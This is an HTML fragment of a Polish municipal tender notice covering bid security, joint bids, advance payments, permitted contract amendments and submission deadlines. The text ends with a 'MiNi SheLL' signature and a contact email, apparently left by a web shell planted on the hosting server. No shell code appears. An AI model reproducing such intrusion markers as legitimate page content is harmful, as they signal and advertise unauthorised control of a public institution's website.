gwarancjach ubezpieczeniowych<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. 310, 836 i 1572).<br/>4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy wskazany przez zamawiającego: Bank Spółdzielczy Koronowo O/Śliwice 30 8144 0005 2006 0060 4514 0004. Za termin wniesienia wadium w pieniądzu przyjmuje się datę i godzinę uznania na rachunku bankowym Zamawiającego, a nie datę wydania dyspozycji przelewu.<br/>5.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2-4, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>6.	Zamawiający zwraca wadium niezwłocznie, nie później jednak niż w terminie 7 dni od dnia wystąpienia jednej z okoliczności:<br/>1)	upływu terminu związania ofertą;<br/>2)	zawarcia umowy w sprawie zamówienia publicznego;<br/>3)	unieważnienia postępowania o udzielenie zamówienia, z wyjątkiem sytuacji gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>7.	Zamawiający, niezwłocznie, nie później jednak niż w terminie 7 dni od dnia złożenia wniosku zwraca wadium wykonawcy:<br/>1)	który wycofał ofertę przed upływem terminu składania ofert;<br/>2)	którego oferta została odrzucona;<br/>3)	po wyborze najkorzystniejszej oferty, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza;<br/>4)	po unieważnieniu postępowania, w przypadku gdy nie zostało rozstrzygnięte odwołanie na czynność unieważnienia albo nie upłynął termin do jego wniesienia.<br/>8.	Złożenie wniosku o zwrot wadium, o którym mowa w ust. 7, powoduje rozwiązanie stosunku prawnego z wykonawcą wraz z utratą przez niego prawa do korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy.<br/>9.	Zamawiający zwraca wadium wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.<br/>10.	Zamawiający zwraca wadium wniesione w innej formie niż w pieniądzu poprzez złożenie gwarantowi lub poręczycielowi oświadczenia o zwolnieniu wadium.<br/> 11.	Zamawiający zatrzymuje wadium wraz z odsetkami, a w przypadku wadium wniesionego w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2-4, występuje odpowiednio do gwaranta lub poręczyciela z żądaniem zapłaty wadium zgodnie z art. 98 ust 6 ustawy. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. W przypadku, o którym mowa w ust. 1, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>Stosowne pełnomocnictwo należy złożyć wraz z ofertą.<br/>3. Przepisy dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających<br/>się o udzielenie zamówienia kluczowych zadań dotyczących robót budowlanych.<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienia przez wielu Wykonawców, oświadczenie, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp o niepodleganiu wykluczeniu z<br/>postępowania oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego składa<br/>każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków<br/>udziału w postępowaniu.<br/>6. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na<br/>zdolnościach tych z wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są<br/>wymagane. W takim przypadku Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> 1. Zamawiający przewiduje udzielenie zaliczki, która zostanie wypłacona zgodnie z warunkami wypłat dofinansowania z Programu Rządowy Fundusz Polski Ład: Program Inwestycji<br/>Strategicznych, tj. Wykonawcy zostanie udzielona zaliczka w wysokości min. 10% wynagrodzenia należnego Wykonawcy w terminie do 60 dni od dnia podpisania umowy na konto bankowe<br/>wskazane przez Wykonawcę ……………………………………………… .oraz po spełnieniu wymagań określonych w § 5 ust 13. <br/>2. Kwota zaliczki wyliczona na podstawie złożonej oferty wynosi …………… zł .<br/>3. Po otrzymaniu zaliczki Wykonawca jest zobowiązany wystawić i przekazać Zamawiającemu fakturę zaliczkową.<br/>4. Zamawiający żąda wniesienia zabezpieczenia zaliczki, jeżeli przewidywana wartość zaliczki, o której mowa w § 4 ust 6 projektu umowy przekracza 20% wysokości wynagrodzenia<br/>wykonawcy. 14. Zabezpieczenie zaliczki wnosi się w formie określonej w art. 442 ust 3 PZP. <br/>5. Zamawiający przewidywać możliwość zmiany formy zabezpieczenia zaliczki w trakcie realizacji tej umowy przy zachowaniu ciągłości zabezpieczenia.<br/>6. Zabezpieczenie zaliczki należy wnieść przed wypłatą zaliczki.<br/>7. Zabezpieczenie zaliczki zostanie zwrócone po upływie 15 dni od dnia podpisania protokołu odbioru częściowego zadania, o którym mowa w § 11 ust 3 pkt 1 projektu umowy. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W przypadku:<br/>1.zmiany wysokości obowiązującej stawki podatku VAT w sytuacji, gdy w trakcie realizacji przedmiotu umowy nastąpi zmiana stawki podatku VAT dla robót objętych przedmiotem umowy<br/>Zamaw. dopuszcza możliwość zmiany wysokości wynagrodzenia, określonego w umowie–zmianie ulega wartość brutto,wartość netto pozostaje bez zmian.<br/>2. zmiany regulacji prawnych się do praw i obowiązków stron umowy, wprowadzonych po jej zawarciu, wywołujących potrzebę zmiany sposobu realizacji umowy, Zamaw.dopuszcza<br/>możliwość zmiany sposobu realizacji umowy,wysokości wynagrodzenia określonego w umowie, lub terminu zakończenia realizacji przedmiotu umowy.<br/>3.przestojów lub opóźnień w realizacji przedmiotu umowy,wywołanych przyczynami niezależnymi od stron umowy,w szczególności:warunków atmosferycznych uniemożliwiających<br/>prowadzenie robót budowlanych,przeprowadzanie prób i sprawdzeń,zgodnie z technologią przewidzianą przez producentów,dokonywanie odbiorów.<br/>4.zaistnienia okoliczności związanych z wystąpieniem i utrzymywaniem się stanu zagrożenia epidemicznego lub stanu epidemii,wpływających lub mogących wpłynąć na należyte<br/>wykonanie umowy Zamaw.,dopuszcza zmianę terminu realizacji zamówienia,czasowe zawieszenie wykonywania umowy,zmianę sposobu wykonywania umowy,zmianę technologii robót, oraz zmianę wynagrodzenia wykonawcy lub ograniczenie zakresu robót.<br/>5.konieczności zmiany technologii wykonywania przedmiotu umowy,zastosowania rozwiązań zamiennych, zastępczych lub równoważnych.<br/>6.gdy z przyczyn technicznych,które nie mogły być przewidziane przez Zamaw.pomimo dołożenia należytej staranności lub które ujawniły się podczas wykonywania prac,lub gdy jest to korzystne dla interesu publicznego lub interesu Zamaw.<br/>7.działania siły wyższej rozumianej jako wszystkie zdarzenia zewnętrzne niemożliwe do przewidzenia i niemożliwe do zapobieżenia przez Stronę lub Strony umowy,a zaistniałe po zawarciu umowy.<br/>8.wystąpienia niemożliwych do przewidzenia warunków w miejscach realizacji robót Zamaw.dopuszcza możliwość zmiany technologii wykonywania robót i wynagrodzenia wykonawcy,określonego w umowie oraz jeżeli w wyniku opisanych powyżej przeszkód wystąpi opóźnienie,Zamaw.dopuszcza zmianę terminu zakończenia realizacji przedmiotu umowy,poprzez przedłużenie o okres takiego opóźnienia.<br/>9.przestojów lub opóźnień w wykonywaniu prac przez Wykonawcę będących następstwem błędów w wymaganiach Zamaw.,jeżeli w skutek opóźnień w wykonywaniu prac wystąpi wydłużenie czasu koniecznego dla wykonania przedmiotu umowy,Zamaw.<br/>dopuszcza zmianę terminu zakończenia realizacji przedmiotu umowy,poprzez wydłużenie o okres takiego opóźnienia lub o okres konieczny dla wykonania przedmiotu umowy po<br/>wprowadzonych zmianach oraz możliwość zmiany wynagrodzenia wykonawcy określonego w umowie.<br/>10.Dopuszczalna jest zmiana umowy w zakresie przedmiotu umowy,terminu realizacji zamówienia i wysokości wynagrodzenia,jeżeli zmiana umowy dotyczyć będzie materiałów,<br/>urządzeń,rozwiązań lub technologii wskazanych w opisie przedmiotu umowy,w tym w dokumentacji projektowej i polegać będzie na zastąpieniu ich materiałami,urządzeniami,<br/>rozwiązaniami lub technologiami równoważnymi w przypadku zaistnienia okoliczności uniemożliwiających,znacznie utrudniających lub świadczących o niecelowości i nieracjonalności pozyskania materiałów,urządzeń,rozwiązań lub technologii wskazanych w opisie przedmiotu umowy w tym w dokumentacji projektowej,w szczególności takich jak zaprzestanie<br/>produkcji,zaprzestanie importu,wykrycie wad istotnych.<br/>11.Przez zmianę wynagrodzenia,o którym mowa w ust.2 oraz ust. 4–10 należy rozumieć zmniejszenie nie więcej niż o 15% wynagrodzenia umownego brutto określonego w §4 ust.2.<br/>12.Zamaw.dopuszcza zmianę terminu realizacji niniejszej umowy spowodowaną koniecznością zmiany terminu wykonania którejkolwiek z pozostałych część zamówienia,wymienionych w §1 ust2 umowy,zgodnie z warunkami określonymi w Programie Rządowy Fundusz Polski Ład:Program Inwestycji Strategicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-07-15 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z wymaganymi dokumentami należy umieścić na platformazakupowa.pl pod adresem: https://platformazakupowa.pl/pn/sliwice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-07-15 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-13</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com